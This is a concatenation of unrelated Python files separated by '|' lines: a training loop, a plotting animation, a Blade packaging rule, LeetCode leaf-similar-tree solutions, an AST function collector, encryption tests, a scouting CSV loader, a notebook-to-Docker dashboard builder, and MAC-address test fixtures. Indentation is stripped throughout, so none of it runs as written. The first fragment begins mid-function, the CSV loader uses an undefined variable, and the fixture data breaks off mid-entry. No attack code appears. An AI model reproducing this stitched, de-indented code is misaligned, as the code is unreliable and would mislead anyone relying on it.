Xtrain = data.Xtrain[perm]
Ytrain = data.Ytrain[perm]
# batches
for j in range(N // Nbatch):
X = Xtrain[perm[j * Nbatch:(j+1) * Nbatch]]
Y = Ytrain[perm[j * Nbatch:(j+1) * Nbatch]]
Yhat, outputs = forward(params, Variable(X, requires_grad=False))
L, _ = loss_accuracy(Yhat, Variable(Y, requires_grad=False))
L.backward()
params = sgd(params, 0.03)
Yhat_train, _ = forward(params, Variable(data.Xtrain, requires_grad=False))
Yhat_test, _ = forward(params, Variable(data.Xtest, requires_grad=False))
Ltrain, acctrain = loss_accuracy(Yhat_train, Variable(data.Ytrain, requires_grad=False))
Ltest, acctest = loss_accuracy(Yhat_test, Variable(data.Ytest, requires_grad=False))
Ygrid, _ = forward(params, Variable(data.Xgrid, requires_grad=False))
title = 'Iter {}: Acc train {:.1f}% ({:.2f}), acc test {:.1f}% ({:.2f})'.format(iteration, acctrain, Ltrain.data[0], acctest, Ltest.data[0])
#print(title)
data.plot_data_with_grid(Ygrid.data, title)
L_train = Ltrain.data[0]
L_test = Ltest.data[0]
data.plot_loss((Ltrain.data[0]), (Ltest.data[0]), acctrain, acctest)
#
|
from pattern_model import Model
SIM_STEP = 0.01
STEPS_PER_FRAME = 20
model = Model(
neuron_count = 100
)
try :
import imp
imp.find_module( "matplotlib" )
from matplotlib import pyplot as plt
from matplotlib import animation
figure = plt.figure()
figure.suptitle( "Model" )
model_plot = figure.add_subplot( 211 )
model_plot.set_ylim( -1.0, 1.0 )
model_plot.grid( True )
input_line, = model_plot.plot( [], [] )
pattern_line, = model_plot.plot( [], [] )
output_plot = figure.add_subplot( 212 )
output_plot.set_ylim( -1.0, 1.0 )
output_plot.grid( True )
train_output_line, = output_plot.plot( [], [] )
output_line, = output_plot.plot( [], [] )
time_data = []
input_data = []
pattern_data = []
train_output_data = []
output_data = []
def animate_model( frame ) :
for i in range( STEPS_PER_FRAME ) :
model.step( SIM_STEP )
time_data.append( model.time )
input_data.append( model.input )
pattern_data.append( model.pattern.value )
train_output_data.append( model.train_output )
output_data.append( model.output )
input_line.set_data( time_data, input_data )
pattern_line.set_data( time_data, pattern_data )
train_output_line.set_data( time_data, train_output_data )
output_line.set_data( time_data, output_data )
model_plot.set_xlim( model.time - 1.0, model.time + 0.1 )
output_plot.set_xlim( model.time - 1.0, model.time + 0.1 )
model_animation = animation.FuncAnimation( figure, animate_model,
interval=30 )
plt.show()
except ImportError :
while True :
model.step( SIM_STEP )
|
# Copyright (c) 2016 Tencent Inc.
# All rights reserved.
#
# Author: Li Wenting <wentingli@tencent.com>
# Date: April 18, 2016
"""
This is the package target module which packages files
into an (compressed) archive.
"""
from __future__ import absolute_import
import os
from blade import build_manager
from blade import build_rules
from blade.blade_util import var_to_list
from blade.target import Target, LOCATION_RE
_package_types = frozenset([
'tar',
'tar.gz',
'tgz',
'tar.bz2',
'tbz',
'zip',
])
class PackageTarget(Target):
"""
This class is used to pack files into an archive which could be
compressed using gzip or bz2 according to the package type.
"""
def __init__(self,
name,
srcs,
deps,
visibility,
type,
out,
shell,
kwargs):
srcs = var_to_list(srcs)
deps = var_to_list(deps)
super(PackageTarget, self).__init__(
name=name,
type='package',
srcs=[],
deps=deps,
visibility=visibility,
kwargs=kwargs)
if type not in _package_types:
self.error('Invalid type %s. Types supported by the package are %s' % (
type, ', '.join(sorted(_package_types))))
self.attr['type'] = type
self.attr['sources'] = []
self.attr['locations'] = []
self._process_srcs(srcs)
if not out:
out = '%s.%s' % (name, type)
self.attr['out'] = out
self.attr['shell'] = shell
def _process_srcs(self, srcs):
"""
Process sources which could be regular files, directories or
location references.
"""
for s in srcs:
if isinstance(s, tuple):
src, dst = s
elif isinstance(s, str):
src, dst = s, ''
else:
self.error('Invalid src %s. src should be either str or tuple.' % s)
continue
m = LOCATION_RE.search(src)
if m:
self._add_location_reference(m, dst)
else:
self._add_package_source(src, dst)
def _add_location_reference(self, m, dst):
"""Add target location reference."""
key, type = self._add_location_reference_target(m)
self.attr['locations'].append((key, type, dst))
def _get_source_path(self, src, dst):
"""
Return src full path within the workspace and mapping path in the archive.
"""
if '..' in src or '..' in dst:
self.error('Invalid src (%s, %s). Relative path is not allowed.' % (src, dst))
if src.startswith('//'):
src = src[2:]
path = src
else:
path = self._source_file_path(src)
if not dst:
dst = src
return path, dst
def _add_package_source(self, src, dst):
"""Add regular file or directory."""
src, dst = self._get_source_path(src, dst)
if not os.path.exists(src):
self.error('Package source %s does not exist.' % src)
elif os.path.isfile(src):
self.attr['sources'].append((src, dst))
else:
for dir, subdirs, files in os.walk(src):
# Skip over subdirs starting with '.', such as .svn
subdirs[:] = [d for d in subdirs if not d.startswith('.')]
for f in files:
f = os.path.join(dir, f)
rel_path = os.path.relpath(f, src)
self.attr['sources'].append((f, os.path.join(dst, rel_path)))
def ninja_rules(self):
inputs, entries = [], []
for src, dst in self.attr['sources']:
inputs.append(src)
entries.append(dst)
targets = self.blade.get_build_targets()
for key, type, dst in self.attr['locations']:
path = targets[key]._get_target_file(type)
if not path:
self.warning('Location %s %s is missing. Ignored.' % (key, type))
continue
if not dst:
dst = os.path.basename(path)
inputs.append(path)
entries.append(dst)
output = self._target_file_path(self.attr['out'])
if not self.attr['shell']:
self.ninja_build('package', output, inputs=inputs,
variables={'entries': ' '.join(entries)})
else:
self._package_in_shell(output, inputs, entries)
@staticmethod
def _rule_from_package_type(t):
if t == 'zip':
return 'package_zip'
return 'package_tar'
@staticmethod
def tar_flags(t):
return {
'tar': '',
'tar.gz': '-z',
'tgz': '-z',
'tar.bz2': '-j',
'tbz': '-j',
}[t]
def _package_in_shell(self, output, inputs, entries):
packageroot = self._target_file_path(self.name + '.sources')
package_sources = []
for src, dst in zip(inputs, entries):
dst = os.path.join(packageroot, dst)
self.ninja_build('copy', dst, inputs=src)
package_sources.append(dst)
vars = {
'entries': ' '.join(entries),
'packageroot': packageroot,
}
type = self.attr['type']
rule = self._rule_from_package_type(type)
if type != 'zip':
vars['tarflags'] = self.tar_flags(type)
self.ninja_build(rule, output, inputs=package_sources, variables=vars)
def package(name=None,
srcs=[],
deps=[],
visibility=None,
type='tar',
out=None,
shell=False,
**kwargs):
package_target = PackageTarget(
name=name,
srcs=srcs,
deps=deps,
visibility=visibility,
type=type,
out=out,
shell=shell,
kwargs=kwargs)
build_manager.instance.register_target(package_target)
build_rules.register_function(package)
|
"""872. Leaf-Similar Trees
https://leetcode.com/problems/leaf-similar-trees/
Consider all the leaves of a binary tree, from left to right order, the
values of those leaves form a leaf value sequence.
For example, in the given tree above, the leaf value sequence is (6, 7, 4, 9,
8).
Two binary trees are considered leaf-similar if their leaf value sequence is
the same.
Return true if and only if the two given trees with head nodes root1 and
root2 are leaf-similar.
Example 1:
Input: root1 = [3,5,1,6,2,9,8,null,null,7,4],
root2 = [3,5,1,6,7,4,2,null,null,null,null,null,null,9,8]
Output: true
Example 2:
Input: root1 = [1], root2 = [1]
Output: true
Example 3:
Input: root1 = [1], root2 = [2]
Output: false
Example 4:
Input: root1 = [1,2], root2 = [2,2]
Output: true
Example 5:
Input: root1 = [1,2,3], root2 = [1,3,2]
Output: false
Constraints:
The number of nodes in each tree will be in the range [1, 200].
Both of the given trees will have values in the range [0, 200].
"""
from typing import List
from common.tree_node import TreeNode
class Solution:
def leaf_similar(self, root1: TreeNode, root2: TreeNode) -> bool:
def helper(node: TreeNode, leaf: List[int]):
if not node:
return
if not node.left and not node.right:
leaf.append(node.val)
return
helper(node.left, leaf)
helper(node.right, leaf)
leaf1, leaf2 = [], []
helper(root1, leaf1)
helper(root2, leaf2)
return leaf1 == leaf2
def leaf_similar2(self, root1: TreeNode, root2: TreeNode) -> bool:
def helper(node: TreeNode, leaf: List[int]):
stack = []
while node or stack:
if node:
stack.append(node)
node = node.left
else:
node = stack.pop()
if not node.left and not node.right:
leaf.append(node.val)
node = node.right
leaf1, leaf2 = [], []
helper(root1, leaf1)
helper(root2, leaf2)
return leaf1 == leaf2
def leaf_similar3(self, root1: TreeNode, root2: TreeNode) -> bool:
def helper(node: TreeNode) -> List[int]:
if not node:
return []
if not node.left and not node.right:
return [node.val]
return helper(node.left) + helper(node.right)
return helper(root1) == helper(root2)
def leaf_similar4(self, root1: TreeNode, root2: TreeNode) -> bool:
def helper(nodes: List[TreeNode]) -> int:
while True:
node = nodes.pop()
if node.right:
nodes.append(node.right)
if node.left:
nodes.append(node.left)
if not node.left and not node.right:
return node.val
s1, s2 = [root1], [root2]
while s1 and s2:
if helper(s1) != helper(s2):
return False
return not s1 and not s2
def leaf_similar5(self, root1: TreeNode, root2: TreeNode) -> bool:
def helper(node: TreeNode):
if node:
if not node.left and not node.right:
yield node.val
yield from helper(node.left)
yield from helper(node.right)
return list(helper(root1)) == list(helper(root2))
|
# -*- coding: utf-8 -*-
__all__ = ('collect_functions',)
from typing import Iterator, Collection, List
import ast
from loguru import logger
import asttokens
import astor
from .analysis import PythonFunction
from .util import ast_with_tokens, ast_location
from ..container import ProjectContainer
from ..core import Location, FileLocationRange, LocationRange
from ..functions import ProgramFunctions
def collect_functions(container: ProjectContainer) -> ProgramFunctions:
"""Finds all functions within a Python project given a container."""
logger.debug(f'collecting functions for project [{container.project}]')
visitor = CollectFunctionsVisitor(container)
for filename in container.project.files:
visitor.collect(filename)
return ProgramFunctions(visitor.functions)
class CollectFunctionsVisitor(ast.NodeVisitor):
def __init__(self, container: ProjectContainer) -> None:
super().__init__()
self.atok: asttokens.ASTTokens
self.container = container
self.functions: List[PythonFunction] = []
def visit_FunctionDef(self, node: ast.FunctionDef) -> None:
location = ast_location(self.atok, node)
body_location = ast_location(self.atok, node.body)
function = PythonFunction(name=node.name,
location=location,
body_location=body_location)
logger.debug(f"found function definition: {function}")
self.functions.append(function)
def collect(self, filename: str) -> None:
self.atok = ast_with_tokens(self.container, filename)
project = self.container
logger.debug(f'collecting functions in file {filename} '
f'for project [{project}]')
self.visit(self.atok.tree)
|
from client.utils import encryption
import unittest
class EncryptionTest(unittest.TestCase):
def assertInverses(self, data, padding=None):
key = encryption.generate_key()
ciphertext = encryption.encrypt(data, key, padding)
self.assertTrue(encryption.is_encrypted(ciphertext))
self.assertEqual(
encryption.decrypt(ciphertext, key),
data
)
def encrypt_empty_test(self):
self.assertInverses('')
def encrypt_empty_with_padding_test(self):
self.assertInverses('', 0)
self.assertInverses('', 200)
self.assertInverses('', 800)
def encrypt_non_ascii_test(self):
self.assertInverses('ठीक है अजगर')
def encrypt_non_ascii_with_padding_test(self):
data = 'ίδιο μήκος'
self.assertInverses(data, 200)
self.assertInverses(data, 800)
def encrypt_exact_size_test(self):
self.assertInverses("hi", 2)
self.assertRaises(ValueError, lambda: encryption.encrypt("hi", encryption.generate_key(), 1))
# accented i in sí, longer than 2 characters
self.assertRaises(ValueError, lambda: encryption.encrypt("sí", encryption.generate_key(), 2))
self.assertInverses("hi", 3)
def pad_to_same_size_test(self):
ct1 = encryption.encrypt("hi", encryption.generate_key(), 1000)
ct2 = encryption.encrypt("hi" * 400, encryption.generate_key(), 1000)
self.assertEqual(len(ct1), len(ct2))
def encryption_decryption_fuzz_test(self):
import random
random.seed(0)
for _ in range(100):
data = "".join(random.choice('a-z' + '0-9' + 'A-Z') for _ in range(random.randint(0, 10)))
self.assertInverses(data)
def invalid_key_test(self):
key1 = encryption.generate_key()
key2 = encryption.generate_key()
data = "test data 123"
ciphertext = encryption.encrypt(data, key1)
self.assertTrue(encryption.is_encrypted(ciphertext))
self.assertRaises(encryption.InvalidKeyException, lambda: encryption.decrypt(ciphertext, key2))
def key_characters_test(self):
for _ in range(100):
self.assertRegex(encryption.generate_key(), "^[0-9a-z]+$")
self.assertTrue(encryption.is_valid_key(encryption.generate_key()))
def find_single_key_test(self):
key = encryption.generate_key()
self.assertEqual([key], encryption.get_keys(
"some text some text some text {} some text some text some text".format(key)))
self.assertEqual([key], encryption.get_keys(key))
self.assertEqual([key] * 7, encryption.get_keys(key * 7))
def find_multiple_key_test(self):
key_a, key_b, key_c = [encryption.generate_key() for _ in range(3)]
self.assertEqual([key_a, key_b, key_c], encryption.get_keys(
"Key A: {}, Key B: {}, Key C: {}".format(key_a, key_b, key_c)))
self.assertEqual([key_a, key_c, key_b, key_a], encryption.get_keys(key_a + key_c + key_b + key_a))
|
import csv
from fuzzy_dict import FuzzyDict
import utils
def load_counselors(counselors_file_path, stake):
"""Parse counselors file for counselors in specified stake and return them in a list of parsed csv file rows.
"""
print '\nloading ',counselors_file_path, ' for ', stake, ' stake'
with open(counselors_file_path, 'rb') as f:
# dialect = csv.Sniffer().sniff(f.read(1024))
# f.seek(0)
# reader = csv.reader(f, dialect)
reader = csv.reader(f, delimiter='\t')
if stake == 'all':
viewable_members = [x for x in reader] # Need to remove header row.
else:
viewable_members = [x for x in reader if (str(x[13]) == str(stake))]
return viewable_members
def load_dist_ypt(ypt_file_path):
"""Load district members file from council with Youth Protection Training Dates """
scouters = 0
with open(ypt_file_path, 'rb') as f:
dialect = csv.Sniffer().sniff(f.read(1024))
f.seek(0)
reader = csv.reader(f, dialect)
dist_members = [x for x in reader]
for row in reader:
member_ID = row[0]
stake_name = c[5],
dist_position = c[45],
# This is to skip the header row
if ( scouters == 0 ):
if ( member_ID != 'Person ID' ):
dist_members.append(row)
scouters += 1
print member_ID
# if this line is a new person, add their record
elif ( member_ID != dist_members[scouters-1][0] ):
dist_members.append(row)
scouters += 1
print member_ID
# This person is already recorded, but only shows district data
# Replace the record, retaining only the district position name
elif len(dist_members[scouters-1][5]):
dist_pos = dist_members[scouters-1][45]
g = dist_members.pop(scouters-1)
dist_members.append(row)
dist_members[scouters-1][45] = dist_pos
# This person has a record in place with only unit position data
# If this line read is a district position, add it to their record
elif (len(dist_position) and (len(dist_members[scouters-1][45]) == 0)):
dist_members[scouters-1][45] = dist_position
return dist_members
def make_fuzzy_comparable_counselor_list(counselors):
"""Format list of parsed csv rows of counselors as list which can be fuzzy compared and return it.
Args:
counselors (list) -- List of parsed csv rows
Returns:
list. Formatted list of dictionaries containing relevant fields for fuzzy comparison::
[
{
last_name: 'Smith',
first_name: 'Jonathan',
street: '1234 Meadow Ln',
emails: {
primary: 'johnsmith@gmail.com',
secondary: 'jsmitty345@hotmail.com'
},
phone: {
work: '1234567890',
home: '1232323242'
}
}
]
"""
fuzzy_list = []
for c in counselors:
counselor_dict = FuzzyDict({
'last_name': c[0],
'first_name': c[1],
'street': c[2],
'city': c[3], # state c[4], and Postal Code c[5] not used
'phones': {
'phone2': utils.normalize_phone_number(c[6]),
'phone1': utils.normalize_phone_number(c[7])
},
'emails': {
'email1': c[8],
'email2': c[9]
},
'Y01': c[10], # Expired date c[11] not used
'Y02': c[12],
'stake': c[13],
'member_ID': c[14], # Active and Show Address checkboxes c[15,16] not used
'note': c[17]
})
# print counselor_dict
fuzzy_list.append(counselor_dict)
return fuzzy_list
def make_fuzzy_comparable_district_list(scouters):
fuzzy_d_list = []
for c in scouters:
if c[0] == 'Person ID ':
print 'skipping header row'
elif len(fuzzy_d_list) and c[0] == fuzzy_d_list[len(fuzzy_d_list)-1]['member_ID']:
print 'skipping duplicate {0} {1}'.format(c[14],c[16])
else:
print 'adding scouter {0} {1}'.format(c[14],c[16])
scouter_dict = FuzzyDict({
'member_ID': c[0],
'first_name': c[14],
'middle_name': c[15],
'last_name': c[16],
# 'full_name': c[14] c[15] c[16],
'age': c[21],
'gender': c[24],
'street': c[29],
'phones': {
'phone1': utils.normalize_phone_number(c[53]),
'phone2': ''
},
'emails': {
'email1': c[87],
'email2': c[88]
},
'stake': utils.stake_ID(c[4]) if len(c[4]) else utils.stake_ID(c[43]),
'ward': c[11],
'unit_number': c[7],
'unit_pos': c[38],
'dist_unit': c[43],
'dist_pos': c[45],
'Y01': c[57],
'Y02': c[58],
'award_name': c[94],
'award_date': c[95],
'MBC_code': c[104],
'MBC_unit_only': c[108]
})
fuzzy_d_list.append(scouter_dict)
return fuzzy_d_list
|
#!/usr/bin/env python3
import argparse
import json
import os
import shutil
import subprocess
import sys
import urllib.parse
import nbformat
import requests
# Simplified representation of a Dockerfile
class Dockerfile(object):
commands = {
'voila': ['voila'],
'nbparameterise': ['nbparameterise'],
'panel': ['panel', 'serve']
}
def __init__(self, mode):
self.base_image = 'nb2dashboard'
self.env = {}
self.labels = {}
self.mode = mode
self.files = []
self.build_commands = []
# Set notebook file
def set_notebook(self, filename):
self.notebook = filename
self.add_file(filename)
# Set an environment variable
def set_env(self, key, value):
self.env[key] = value
# Set a docker image label
def set_label(self, key, value):
self.labels[key] = value
# Add a file to the build
def add_file(self, filename):
self.files.append(filename)
# Add an extra RUN command to the build
def add_build_command(self, command):
self.build_commands.append(command)
# Text of the Dockerfile
def __str__(self):
lines = ['FROM ' + self.base_image, '']
if self.env:
s = ' '.join('{}="{}"'.format(k, v) for k, v in self.env.items())
lines.append('ENV ' + s)
if self.labels:
s = ' '.join('{}="{}"'.format(k, v) for k, v in self.labels.items())
lines.append('LABEL ' + s)
if self.files:
s = ', '.join('"{}"'.format(filename) for filename in self.files)
lines.append('ADD [{}, "/home/jovyan/"]'.format(s))
for command in self.build_commands:
lines.append('RUN ' + command)
lines.append('')
cmd = self.commands[self.mode] + ['/home/jovyan/' + self.notebook]
cmd = ', '.join('"' + x + '"' for x in cmd)
lines.append('CMD [{}]'.format(cmd))
lines.append('')
return "\n".join(lines)
# Stage and build a docker image dashboard from a notebook
class NB2Dashboard(object):
def __init__(self, name, mode):
self.name = name
self.build_dir = 'nb2dashboard-' + name
self.make_build_dir()
self.mode = mode
self.dockerfile = Dockerfile(mode)
self.metadata = {}
# Create build directory (docker context)
def make_build_dir(self):
if os.path.exists(self.build_dir):
shutil.rmtree(self.build_dir)
os.makedirs(self.build_dir)
# Remove ipydeps package installation and run during build instead
def groom_ipydeps(self):
for i in range(len(self.notebook.cells)):
cell = self.notebook.cells[i]
if cell.cell_type == 'code' and 'ipydeps' in cell.source:
output = os.path.join(self.build_dir, 'ipydeps_build.py')
with open(output, 'w') as f:
f.write(cell.source)
self.dockerfile.add_file('ipydeps_build.py')
self.dockerfile.add_build_command('python3 ipydeps_build.py')
del self.notebook.cells[i]
break
# Move 'parameters'-tagged cells to top (papermill compatibility)
def groom_parameters(self):
first_code_cell = None
parameters_cell = None
for i in range(len(self.notebook.cells)):
cell = self.notebook.cells[i]
tags = cell.get('metadata', {}).get('tags', {})
if cell.cell_type != 'code':
continue
if first_code_cell is None:
first_code_cell = i
if 'parameters' in tags:
parameters_cell = i
break
if parameters_cell is not None:
cell = self.notebook.cells[parameters_cell]
del self.notebook.cells[parameters_cell]
self.notebook.cells.insert(first_code_cell, cell)
# Remove cells tagged with 'nb2dashboard/ignore'
def groom_ignored(self):
keepers = []
for cell in self.notebook.cells:
tags = cell.get('metadata', {}).get('tags', {})
if 'nb2dashboard/ignore' not in tags:
keepers.append(cell)
self.notebook.cells = keepers
# Modify notebook for suitability with dashboard mode
def groom_notebook(self):
# Run grooming functions
self.groom_ignored()
self.groom_ipydeps()
if self.mode == 'nbparameterise':
self.groom_parameters()
# Save notebook
output = os.path.join(self.build_dir, self.notebook_filename)
with open(output, 'w') as f:
nbformat.write(self.notebook, f)
self.dockerfile.set_notebook(self.notebook_filename)
# Use local notebook file
def notebook_from_file(self, filename):
self.notebook_filename = os.path.basename(filename)
with open(filename) as f:
self.notebook = nbformat.read(f, as_version=4)
# Fetch notebook from remote URL
def notebook_from_url(self, url):
r = requests.get(url, headers={'Accept': 'application/json'})
if r.status_code != 200:
raise RuntimeError('{} {}'.format(r.status_code, r.reason))
self.notebook = nbformat.reads(r.text, as_version=4)
u = urllib.parse.urlparse(url)
self.notebook_filename = u.path.split('/')[-1]
self.metadata['url'] = url
return r
# Fetch notebook from an nbgallery instance
def notebook_from_nbgallery(self, url):
r = self.notebook_from_url(url + '/download')
self.notebook_filename = r.headers['Content-Disposition'].split('"')[1]
self.metadata['url'] = url
# Set metadata from nbgallery section of notebook metadata
def metadata_from_nbgallery_section(self):
gallery = self.notebook.get('metadata', {}).get('gallery', {})
if 'uuid' in gallery:
self.metadata['uuid'] = gallery['uuid']
if 'git_commit_id' in gallery:
self.metadata['git_commit_id'] = gallery['git_commit_id']
# Set metadata from command-line args
def metadata_from_args(self, args):
for key in ['maintainer', 'title', 'description']:
if hasattr(args, key) and getattr(args, key):
self.metadata[key] = getattr(args, key)
# Gather metadata about the notebook
def gather_metadata(self, args):
self.metadata_from_nbgallery_section()
self.metadata_from_args(args)
print('Metadata:')
for k, v in self.metadata.items():
print(k, v)
print()
# Incorporate metadata into docker image
def process_metadata(self):
labels = {
'url': 'notebook',
'maintainer': 'maintainer',
'title': 'title',
'description': 'description'
}
envs = {
'uuid': 'NBGALLERY_UUID',
'git_commit_id': 'NBGALLERY_GIT_COMMIT_ID'
}
for key, label in labels.items():
if key in self.metadata:
self.dockerfile.set_label(label, self.metadata[key])
for key, name in envs.items():
if key in self.metadata:
self.dockerfile.set_env(name, self.metadata[key])
# Write Dockerfile to build dir
def save_dockerfile(self):
output = os.path.join(self.build_dir, 'Dockerfile')
with open(output, 'w') as f:
f.write(str(self.dockerfile))
# Prep all files and save to build dir
def stage(self, args):
if args.file:
self.notebook_from_file(args.file)
elif args.url:
self.notebook_from_url(args.url)
elif args.nbgallery:
self.notebook_from_nbgallery(args.nbgallery)
self.gather_metadata(args)
self.process_metadata()
self.groom_notebook()
self.save_dockerfile()
# Build the docker image
def build(self):
command = 'sudo docker build -t nb2dashboard-{} {}'.format(self.name, self.build_dir)
print(command)
status, output = subprocess.getstatusoutput(command)
if status != 0:
print('docker build failed:')
print(output)
# Main
if __name__ == '__main__':
modes = ['voila', 'nbparameterise', 'panel']
parser = argparse.ArgumentParser(description='Build dashboard image from notebook')
parser.add_argument('--name', help='image name suffix', required=True)
parser.add_argument('--file', help='build from notebook file')
parser.add_argument('--url', help='build from notebook URL')
parser.add_argument('--nbgallery', help='build from nbgallery URL')
parser.add_argument('--mode', help='dashboard mode', default='voila', choices=modes)
parser.add_argument('--maintainer', help='image maintainer')
parser.add_argument('--title', help='notebook title')
parser.add_argument('--description', help='notebook description')
parser.add_argument('--build', help='build the image', default=False, action='store_true')
args = parser.parse_args(sys.argv[1:])
if not (args.file or args.url or args.nbgallery):
raise RuntimeError('--file, --url, or --nbgallery must be specified')
nb2dashboard = NB2Dashboard(args.name, args.mode)
nb2dashboard.stage(args)
if args.build:
nb2dashboard.build()
|
INVALID_OCTET = [
"f", # Too few digits
"fff", # Too many digits
"g" # Invalid digit
]
OCTET = [
("A0", "a0", 160, "10100000", "00000101"),
("a0", "a0", 160, "10100000", "00000101"),
("B1", "b1", 177, "10110001", "10001101"),
("b1", "b1", 177, "10110001", "10001101"),
("C2", "c2", 194, "11000010", "01000011"),
("c2", "c2", 194, "11000010", "01000011"),
("D3", "d3", 211, "11010011", "11001011"),
("d3", "d3", 211, "11010011", "11001011"),
("E4", "e4", 228, "11100100", "00100111"),
("e4", "e4", 228, "11100100", "00100111"),
("F5", "f5", 245, "11110101", "10101111"),
("f5", "f5", 245, "11110101", "10101111")
]
INVALID_IDENTIFIER = [
"0a", # Too few digits
"0a1b2c3d4e5f6", # Too many digits
"0a1b2c3d4e5g", # Invalid digit
"-0a-1b-2c-3d-4e-5f", # Leading hyphen
"0a-1b-2c-3d-4e-5f-", # Trailing hyphen
"0a-1b-2c-3d-4e5f", # Missing hyphen
":0a:1b:2c:3d:4e:5f", # Leading colon
"0a:1b:2c:3d:4e:5f:", # Trailing colon
"0a:1b:2c:3d:4e5f", # Missing colon
".0a1b.2c3d.4e5f", # Leading dot
"0a1b.2c3d.4e5f.", # Trailing dot
"0a1b.2c3d4e5f" # Missing dot
]
EUI = [
(
"a0b1c2d3e4f5", # Plain notation (lowercase)
"a0b1c2d3e4f5",
176685338322165,
"101000001011000111000010110100111110010011110101",
"000001011000110101000011110010110010011110101111",
("a0b1c2", "d3e4f5"),
("a0b1c2d3e", "4f5"),
"a0b1c2d3e4f5",
"a0-b1-c2-d3-e4-f5",
"a0:b1:c2:d3:e4:f5",
"a0b1.c2d3.e4f5"
),
(
"A0B1C2D3E4F5", # Plain notation (uppercase)
"a0b1c2d3e4f5",
176685338322165,
"101000001011000111000010110100111110010011110101",
"000001011000110101000011110010110010011110101111",
("a0b1c2", "d3e4f5"),
("a0b1c2d3e", "4f5"),
"a0b1c2d3e4f5",
"a0-b1-c2-d3-e4-f5",
"a0:b1:c2:d3:e4:f5",
"a0b1.c2d3.e4f5"
),
(
"a0-b1-c2-d3-e4-f5", # Hyphen notation (lowercase)
"a0b1c2d3e4f5",
176685338322165,
"101000001011000111000010110100111110010011110101",
"000001011000110101000011110010110010011110101111",
("a0b1c2", "d3e4f5"),
("a0b1c2d3e", "4f5"),
"a0b1c2d3e4f5",
"a0-b1-c2-d3-e4-f5",
"a0:b1:c2:d3:e4:f5",
"a0b1.c2d3.e4f5"
),
(
"A0-B1-C2-D3-E4-F5", # Hyphen notation (uppercase)
"a0b1c2d3e4f5",
176685338322165,
"101000001011000111000010110100111110010011110101",
"000001011000110101000011110010110010011110101111",
("a0b1c2", "d3e4f5"),
("a0b1c2d3e", "4f5"),
"a0b1c2d3e4f5",
"a0-b1-c2-d3-e4-f5",
"a0:b1:c2:d3:e4:f5",
"a0b1.c2d3.e4f5"
),
(
"a0:b1:c2:d3:e4:f5", # Colon notation (lowercase)
"a0b1c2d3e4f5",
176685338322165,
"101000001011000111000010110100111110010011110101",
"000001011000110101000011110010110010011110101111",
("a0b1c2", "d3e4f5"),
("a0b1c2d3e", "4f5"),
"a0b1c2d3e4f5",
"a0-b1-c2-d3-e4-f5",
"a0:b1:c2:d3:e4:f5",
"a0b1.c2d3.e4f5"
),
(
"A0:B1:C2:D3:E4:F5", # Colon notation (uppercase)
"a0b1c2d3e4f5",
176685338322165,
"101000001011000111000010110100111110010011110101",
"000001011000110101000011110010110010011110101111",
("a0b1c2", "d3e4f5"),
("a0b1c2d3e", "4f5"),
"a0b1c2d3e4f5",
"a0-b1-c2-d3-e4-f5",
"a0:b1:c2:d3:e4:f5",
"a0b1.c2d3.e4f5"
),
(
"a0b1.c2d3.e4f5", # Dot notation (lowercase)
"a0b1c2d3e4f5",
176685338322165,
"101000001011000111000010110100111110010011110101",
"000001011000110101000011110010110010011110101111",
("a0b1c2", "d3e4f5"),
("a0b1c2d3e", "4f5"),
"a0b1c2d3e4f5",
"a0-b1-c2-d3-e4-f5",
"a0:b1:c2:d3:e4:f5",
"a0b1.c2d3.e4f5"
),
(
"A0B1.C2D3.E4F5", # Dot notation (uppercase)
"a0b1c2d3e4f5",
176685338322165,
"101000001011000111000010110100111110010011110101",
"000001011000110101000011110010110010011110101111",
("a0b1c2", "d3e4f5"),
("a0b1c2d3e", "4f5"),
"a0b1c2d3e4f5",
"a0-b1-c2-d3-e4-f5",
"a0:b1:c2:d3:e4:f5",
"a0b1.c2d3.e4f5"
)
]
ELI = [
(
"0a1b2c3d4e5f", # Plain notation (lowercase)
"0a1b2c3d4e5f",
11111822610015,
"000010100001101100101100001111010100111001011111",
"010100001101100000110100101111000111001011111010",
("0a1b2c", "3d4e5f"),
("0a1b2c3d4", "e5f"),
"0a1b2c3d4e5f",
"0a-1b-2c-3d-4e-5f",
"0a:1b:2c:3d:4e:5f",
"0a1b.2c3d.4e5f"
),
(
"0A1B2C3D4E5F", # Plain notation (uppercase)
"0a1b2c3d4e5f",
11111822610015,
"000010100001101100101100001111010100111001011111",
"010100001101100000110100101111000111001011111010",
("0a1b2c", "3d4e5f"),
("0a1b2c3d4", "e5f"),
"0a1b2c3d4e5f",
"0a-1b-2c-3d-4e-5f",
"0a:1b:2c:3d:4e:5f",
"0a1b.2c3d.4e5f"
),
(
"0a-1b-2c-3d-4e-5f", # Hyphen notation (lowercase)
"0a1b2c3d4e5f",
11111822610015,
"000010100001101100101100001111010100111001011111",
"010100001101100000110100101111000111001011111010",
("0a1b2c", "3d4e5f"),
("0a1b2c3d4", "e5f"),
"0a1b2c3d4e5f",
"0a-1b-2c-3d-4e-5f",
"0a:1b:2c:3d:4e:5f",
"0a1b.2c3d.4e5f"
),
(
"0A-1B-2C-3D-4E-5F", # Hyphen notation (uppercase)
"0a1b2c3d4e5f",
11111822610015,
"000010100001101100101100001111010100111001011111",
"010100001101100000110100101111000111001011111010",
("0a1b2c", "3d4e5f"),
("0a1b2c3d4", "e5f"),
"0a1b2c3d4e5f",
"0a-1b-2c-3d-4e-5f",
"0a:1b:2c:3d:4e:5f",
"0a1b.2c3d.4e5f"
),
(
"0a:1b:2c:3d:4e:5f", # Colon notation (lowercase)
"0a1b2c3d4e5f",
11111822610015,
"000010100001101100101100001111010100111001011111",
"010100001101100000110100101111000111001011111010",
("0a1b2c", "3d4e5f"),
("0a1b2c3d4", "e5f"),
"0a1b2c3d4e5f",
"0a-1b-2c-3d-4e-5f",
"0a:1b:2c:3d:4e:5f",
"0a1b.2c3d.4e5f"
),
(
"0A:1B:2C:3D:4E:5F", # Colon notation (uppercase)
"0a1b2c3d4e5f",
11111822610015,
"000010100001101100101100001111010100111001011111",
"010100001101100000110100101111000111001011111010",
("0a1b2c", "3d4e5f"),
("0a1b2c3d4", "e5f"),
"0a1b2c3d4e5f",
"0a-1b-2c-3d-4e-5f",
"0a:1b:2c:3d:4e:5f",
"0a1b.2c3d.4e5f"
),
(
"0a1b.2c3d.4e5f", # Dot notation (lowercase)
"0a1b2c3d4e5f",
11111822610015,
"000010100001101100101100001111010100111001011111",
"010100001101100000110100101111000111001011111010",
("0a1b2c", "3d4e5f"),
("0a1b2c3d4", "e5f"),
"0a1b2c3d4e5f",
"0a-1b-2c-3d-4e-5f",
"0a:1b:2c:3d:4e:5f",
